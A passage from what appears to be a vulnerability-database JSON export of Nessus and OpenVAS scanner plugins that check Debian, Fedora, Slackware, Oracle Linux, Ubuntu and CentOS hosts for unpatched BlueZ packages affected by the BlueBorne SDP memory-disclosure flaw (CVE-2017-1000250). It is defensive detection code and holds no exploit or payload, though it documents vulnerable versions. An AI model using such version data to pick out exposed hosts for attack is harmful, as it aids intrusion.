(deb_check(release:\"7.0\", prefix:\"bluez-compat\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-cups\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-gstreamer\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-pcmcia-support\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-utils\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth-dev\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:35:36", "bulletinFamily": "scanner", "description": "Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart connected Broadcom HCIs found on some Atom based x86 hardware\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-02-02T00:00:00", "id": "FEDORA_2017-77F991E537.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105904", "published": "2018-01-15T00:00:00", "title": "Fedora 27 : bluez (2017-77f991e537) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-77f991e537.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105904);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/02 14:51:02 $\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"FEDORA\", value:\"2017-77f991e537\");\n\n script_name(english:\"Fedora 27 : bluez (2017-77f991e537) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for\n PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart\n connected Broadcom HCIs found on some Atom based x86\n hardware\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-77f991e537\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"bluez-5.46-6.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:57", "bulletinFamily": "scanner", "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.", "modified": "2018-01-26T00:00:00", "id": "SLACKWARE_SSA_2017-258-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103255", "published": "2017-09-18T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-258-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103255);\n script_version(\"$Revision: 3.4 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:57:43 $\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"SSA\", value:\"2017-258-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bluez packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4e6d349\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"4_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"x86_64\", pkgnum:\"4_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"5.47\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:slackware_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:54", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-07-24T00:00:00", "id": "ORACLELINUX_ELSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103166", "published": "2017-09-13T00:00:00", "title": "Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2685 and \n# Oracle Linux Security Advisory ELSA-2017-2685 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103166);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/07/24 18:56:12\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"RHSA\", value:\"2017:2685\");\n\n script_name(english:\"Oracle Linux 6 / 7 : bluez (ELSA-2017-2685) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2685 :\n\nAn update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-September/007204.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-hid2hci\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bluez-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-alsa-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-compat-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-cups-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-gstreamer-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-4.66-2.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bluez-libs-devel-4.66-2.el6_9\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-cups-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-hid2hci-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-5.44-4.el7_4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bluez-libs-devel-5.44-4.el7_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / bluez-gstreamer / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:32:55", "bulletinFamily": "scanner", "description": "It was discovered that an information disclosure vulnerability existed in the Service Discovery Protocol (SDP) implementation in BlueZ. A physically proximate unauthenticated attacker could use this to disclose sensitive information. (CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-3413-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103187", "published": "2017-09-13T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3413-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103187);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/12/01 15:12:41\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"USN\", value:\"3413-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : bluez vulnerability (USN-3413-1) (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that an information disclosure vulnerability existed\nin the Service Discovery Protocol (SDP) implementation in BlueZ. A\nphysically proximate unauthenticated attacker could use this to\ndisclose sensitive information. (CVE-2017-1000250).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3413-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez and / or libbluetooth3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bluez\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libbluetooth3\", pkgver:\"4.101-0ubuntu13.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"bluez\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libbluetooth3\", pkgver:\"5.37-0ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"bluez\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libbluetooth3\", pkgver:\"5.43-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / libbluetooth3\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310882767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882767", "title": "CentOS Update for bluez CESA-2017:2685 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882767\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:16:10 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted 